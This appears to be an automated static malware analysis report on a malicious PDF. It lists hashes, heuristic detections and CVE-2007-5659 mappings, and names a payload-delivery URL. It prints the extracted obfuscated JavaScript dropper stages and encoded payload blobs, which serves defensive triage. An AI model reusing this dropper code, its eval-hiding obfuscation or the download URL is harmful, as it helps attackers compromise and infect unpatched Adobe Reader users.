Malicious PDF — malware analysis report

Static analysis result for SHA-256 744927087c652217…

MALICIOUS

PDF

15.2 KB
MD5: ed37859a852e34d77ff2bb32788309c8 SHA-1: 0c0627e8fb8b0f0bf37a0fbf6bb501268f920667 SHA-256: 744927087c65221749693f1dc276f0fd51258e4408e1566f7a8b54c94d564b6e
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains obfuscated JavaScript designed to exploit CVE-2007-5659 in Adobe Reader. The script decodes a URL from the annotation subject and uses String.fromCharCode with hex-dashed payloads to construct a download command. This command is then executed, likely to fetch and run a second-stage payload. The embedded URL http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865Xbc177be6Y18b6d1feZ0100f060 is the primary indicator for the payload delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865Xbc177be6Y18b6d1feZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
aff90214be71196597aec8e7bae84884530d3e332ed91e4a3b594bcf69782d8d		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x19A7 12133 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function uw8w_xxs(Xsyl5Qe_Fb, rQ_uYO_0wo__YTs){var fT_L_ib = 20;var r00cD1 = 0;var p0_741_o = 512;var Q3K73_5 = fT_L_ib;var X__xufc_g = "";var lsp20b4qh = 4;var AD0a__n_8FbQ = this;var p_vo_R6_5 = "1234ee";var ig__nA = arguments;try {var EkP63c20WYk6 = 0;if (app) {Q3K73_5 = Q3K73_5 + 2;rQ_uYO_0wo__YTs = pr[EkP63c20WYk6].subject;}p_vo_R6_5 = p_vo_R6_5.replace(/\d+/, "call");} catch(e) { }Q3K73_5 = Q3K73_5 - fT_L_ib;var b_1_C2uc8X_6_0 = new Array();var vlVn_6_4F__W4d = 150;if (vlVn_6_4F__W4d > 0) {b_1_C2uc8X_6_0[0] = vlVn_6_4F__W4d;b_1_C2uc8X_6_0[1] = p0_741_o;b_1_C2uc8X_6_0[0] = b_1_C2uc8X_6_0[0] - vlVn_6_4F__W4d;b_1_C2uc8X_6_0[2] = b_1_C2uc8X_6_0[0];b_1_C2uc8X_6_0[1] = b_1_C2uc8X_6_0[1] - p0_741_o;b_1_C2uc8X_6_0[3] = b_1_C2uc8X_6_0[1];}if (Xsyl5Qe_Fb) { b_1_C2uc8X_6_0 = Xsyl5Qe_Fb;}if (!Xsyl5Qe_Fb) {var l47XXWW = ig__nA[p_vo_R6_5].toString();var Bf2eh5SV = 0;var Aq8_w_6 = Bf2eh5SV;vlVn_6_4F__W4d = vlVn_6_4F__W4d - 102;var WMO1__5_r__tx = 0;while(Aq8_w_6 < l47XXWW.length) {WMO1__5_r__tx = l47XXWW.charCodeAt(Aq8_w_6);if (WMO1__5_r__tx >= vlVn_6_4F__W4d && WMO1__5_r__tx <= 57) {if (Bf2eh5SV == lsp20b4qh) {Bf2eh5SV = -1;}if (Bf2eh5SV < 0) { Bf2eh5SV = 0; }b_1_C2uc8X_6_0[Bf2eh5SV] += WMO1__5_r__tx;if (b_1_C2uc8X_6_0[Bf2eh5SV] > p0_741_o) {b_1_C2uc8X_6_0[Bf2eh5SV] -= p0_741_o;}Bf2eh5SV = Bf2eh5SV + 1;}Aq8_w_6 = Aq8_w_6 + 1;}}var I_IV3gI04g = 0;var Lke_e6e = 0;var M_71wVn_5heBLy = -1;var kol_0v = 0;var pOjK8X20__4ud = 0;do {var YvABnv_8_6 = 256;if (b_1_C2uc8X_6_0[kol_0v] > YvABnv_8_6) {b_1_C2uc8X_6_0[kol_0v] -= YvABnv_8_6;}kol_0v = kol_0v + 1;} while (kol_0v < lsp20b4qh);kol_0v = kol_0v - lsp20b4qh;while(kol_0v < rQ_uYO_0wo__YTs.length) {var EAQ_JSd0 = rQ_uYO_0wo__YTs.substr(kol_0v, 1) + ' V V ';kol_0v = kol_0v + 1;var F0c6G_5_T_toFy = parseInt(EAQ_JSd0, fT_L_ib);if (M_71wVn_5heBLy != -1) {Lke_e6e += F0c6G_5_T_toFy;if (I_IV3gI04g == lsp20b4qh) {I_IV3gI04g = 0;}var hX1vST2rj_Pi8i = Lke_e6e;hX1vST2rj_Pi8i = hX1vST2rj_Pi8i - (pOjK8X20__4ud + 2) * b_1_C2uc8X_6_0[I_IV3gI04g];if (hX1vST2rj_Pi8i <= 0) {hX1vST2rj_Pi8i = hX1vST2rj_Pi8i - Math.floor(hX1vST2rj_Pi8i / 256) * 256;}hX1vST2rj_Pi8i = String.fromCharCode(hX1vST2rj_Pi8i);if (Q3K73_5 == 1) {X__xufc_g += F0c6G_5_T_toFy;} else if (Q3K73_5 == 2) {X__xufc_g += hX1vST2rj_Pi8i;} else {X__xufc_g += kol_0v;M_71wVn_5heBLy = -2;}M_71wVn_5heBLy = -1;I_IV3gI04g = I_IV3gI04g + 1;pOjK8X20__4ud = pOjK8X20__4ud + 1;} else if (M_71wVn_5heBLy == -1) {M_71wVn_5heBLy = fT_L_ib;Lke_e6e = F0c6G_5_T_toFy * fT_L_ib;}}var SiKNI8mr1_Pldpd = this;SiKNI8mr1_Pldpd['ev'+'al'](X__xufc_g);}
	uw8w_xxs(0, "20cd0a864g8273098b5ccb513f349f7181263i6eb7a4ce03697g553cb48d2h2ecb47a687880c2ea2c21abbbb3ab8671i9d74ag4jba4c6jac6j5a0801bh23b32j20a54d65a770bh4eb04e6bb07762371ebf3fba063j0b345296ajc191ba8b87924i633518943f884d0a094d675b949cb2c09785142j6j3507b95ea16gbi1a2b926icfc7a8bc8d73c44c59353f663d687i0g2j51ag4b0b01a4cebf633e4g91265h62397798134e0gbf3jcdbb1190bi673h1097247i52555c68a42f3i0568c4c627b8986h3f2ha30f5d876h9c7aaj240gbd1e3h993d9h0b376j13c4a0763i7i5fc6be672f0g3c25a72c98bh696jbgc805b06ha880b5867h11353d4b7f6b7f382361aj980jcc5jb24024ah591d4531309g637f21249hb01b8gaj22bg6h3cb58h09643a388a617i3843b1b80ea1112cbi4153936i237f207j9ga8425925c9bh238j2j3310381i6f79ah611f82547i335h43ccb722804439b15565898c0c83077d5gbh3c7301bj7a53b24d0b1153795ac0bh9jbj747bb0613g0dceag4b7d5b2523288i67c5b996c58283bg5a8b1756a85ha679be0d26734h11c69a8ibe6f073b8b1b3292558h77be3f1ic13c20bh1gb9006g0e1b7dag475b3ga366144b15bj59238g2a9bc5512i2d821f4e5j4c56869c240ba65c2j89339h0b346a13adc56i716a8ja18i7d312a554174539cb028841999c9a569707gc3b36104311c5b7a6a8j2i539e1698959f2e7i49b2c54c2e450f519b715e34399bc3b4bjac657g51c67464c0280d30ad8j57253jb1a81abb1128bf78526a7dag781h4d89996h243gb7bb159025200f2g295iahb967157f66ag65570i0dc6448j4j4j1f606f92b5a89fb7717jbh3c662f1h883fb85i0820598485000872b2645ca71i87c03f7j319j5h04264f8d50cb0cce928940b4224ebc1d6661795b1d2j26a06d0b9ecdcec44jc6579e1d685e4e9360bc313j8h2ic98806b1c55i283578134677697d73ag5c47bd6a32bd30ah9g3d30cf8715844a506iada832290d2d0ab83fac0j6c6ebe95b95i4f5h4g098i4e2fc82031a72962c92048bi8e9c7d367i7bag9465270h1h18b9639633515
... (truncated)
deobfuscated.js
d232af3ad1cacef79098aa53d9c478c038ed70aa31e5d52111683266917d5afe		 deobfuscated-js PDF JavaScript deobfuscation pass 113820 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

20cd0a864g8273098b5ccb513f349f7181263i6eb7a4ce03697g553cb48d2h2ecb47a687880c2ea2c21abbbb3ab8671i9d74ag4jba4c6jac6j5a0801bh23b32j20a54d65a770bh4eb04e6bb07762371ebf3fba063j0b345296ajc191ba8b87924i633518943f884d0a094d675b949cb2c09785142j6j3507b95ea16gbi1a2b926icfc7a8bc8d73c44c59353f663d687i0g2j51ag4b0b01a4cebf633e4g91265h62397798134e0gbf3jcdbb1190bi673h1097247i52555c68a42f3i0568c4c627b8986h3f2ha30f5d876h9c7aaj240gbd1e3h993d9h0b376j13c4a0763i7i5fc6be672f0g3c25a72c98bh696jbgc805b06ha880b5867h11353d4b7f6b7f382361aj980jcc5jb24024ah591d4531309g637f21249hb01b8gaj22bg6h3cb58h09643a388a617i3843b1b80ea1112cbi4153936i237f207j9ga8425925c9bh238j2j3310381i6f79ah611f82547i335h43ccb722804439b15565898c0c83077d5gbh3c7301bj7a53b24d0b1153795ac0bh9jbj747bb0613g0dceag4b7d5b2523288i67c5b996c58283bg5a8b1756a85ha679be0d26734h11c69a8ibe6f073b8b1b3292558h77be3f1ic13c20bh1gb9006g0e1b7dag475b3ga366144b15bj59238g2a9bc5512i2d821f4e5j4c56869c240ba65c2j89339h0b346a13adc56i716a8ja18i7d312a554174539cb028841999c9a569707gc3b36104311c5b7a6a8j2i539e1698959f2e7i49b2c54c2e450f519b715e34399bc3b4bjac657g51c67464c0280d30ad8j57253jb1a81abb1128bf78526a7dag781h4d89996h243gb7bb159025200f2g295iahb967157f66ag65570i0dc6448j4j4j1f606f92b5a89fb7717jbh3c662f1h883fb85i0820598485000872b2645ca71i87c03f7j319j5h04264f8d50cb0cce928940b4224ebc1d6661795b1d2j26a06d0b9ecdcec44jc6579e1d685e4e9360bc313j8h2ic98806b1c55i283578134677697d73ag5c47bd6a32bd30ah9g3d30cf8715844a506iada832290d2d0ab83fac0j6c6ebe95b95i4f5h4g098i4e2fc82031a72962c92048bi8e9c7d367i7bag9465270h1h18b9639633515a1702948e48a34ic0a37fcb1g3e5da6799238146fb7a49e9j22c73c14a566c24f293j606b460e1c8e98c7882b579d4h3h9d76166d1h4e8faa82181h928gcf82bi19984a516g7i017hbh4c5f7a344c02a68dccb9171j0b5b448caj076g0d9c94a16c693g2jbc4a74570fcd53795gbicfa5ac978c1a35892e43ag4fb067312i1c9c52c5c0c1a0827c1f29582h238b2c824i073d347i671705a6a68c7g2h165821348j448a60be1b2ab1610g992587077a3j4464046g615j8fa5ca353ba459cdb32b76ah2g5g2jb7a8678c8e89bj9i2602af3142ah486e005b74128j198e627d718ea73016ca2j49942e8j236552029810a94daa7d148662323130417g536h2d525aai9gbac45h9a6dc2a34c05121c34857f6i1041ad17b0aca666b34636a79b2c473468999a6d4214809b2994ba1c913d0e6b7dag43c7455cah774i089ab02ib31c3ba8551i6970ba4ec761549442413hc6962dbb4b12c034768d8a1097188j90c62j30430iag1b974d3d0c3h795gbfa9a5079354031i55c01c7i35ad4e061h5b9f4ib4a0cac97e832b4c8f30546e4aa671102924933aaf8gaa927g4acf21801b687i43a57i022h317i47b0a2be9fc9541i2ja325466i4c9g9dag5b4dc86934c22fb403342e0270ce8c7d727h8abj2d17236722ba399401385bbe95a06f558i8f008i383d0b493fa7299j096846cb8ca88936a56509b96j033f2f5g6g425a2d2a8fbebia2963d8e7319a65d331g3e5da67992382b6e13c1c3cd558f791fba5jbf2fc27ba687880c2b920d2dbb1i5e9e401e8c97136d103g716677263da6b4ce90012ccb5j4a6jb7b2811e7h9695715c39bjc604bd233d0b5b4193a11c67b09c8fb56e72352cb110812c03c75d7g4e90b78611ad7b12624i000i904b9j5h18ca588j80030cbi928959b22351bc5d663j7c812j2j54ai4cb09gbcbdaj6f1g0e6hb4286a32605dae2720c17717c8229098442g3597135g693ga58a0c272bc565189h2588cb3d512j9jce8c7d727h8abj5500bf1e1b8g49b30b6876008cb080718b7jb0a5563a1h3c35843j6dbb378j27a903a5697385c3ce3g0dce2e4e7f4h8d2j40770haac7935ha96jbiaf562c4b3g5fac7a4i17147a9iba8ga739a06i09958b274e13637285533f45ahbc22bb08439c5d3f6a7dag3cc64c5e7d5i4e17b5bh2ja80j41aa5j2f91a90b70207f7ea3424d00ah820dad061fa42a3i627ib784188b76b73a59c8c18j0c822h371e204e52ag0281bh9787c63f6j06317f4ba5382i295a918604948j92b15h1d497fcb4j8b6c6h3ibbcc22733a1jb000999j6f3932751b388h3h938b0h2i4eb1580h9807aj8c4d0e0470bc3c69899j9i0j543h9a670hb725a9a76d433i70bg4e6e7i639dcd6328c34h0iaf139h0h326i27be0fa27a5h4g09ba633e0i254ha03e8709204hcb8c9e777b6648a986602a0h2d4baf5277232e8db7cbcdb56f8h7719ah5b2d3746246j3i5f2h14759ic8c2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.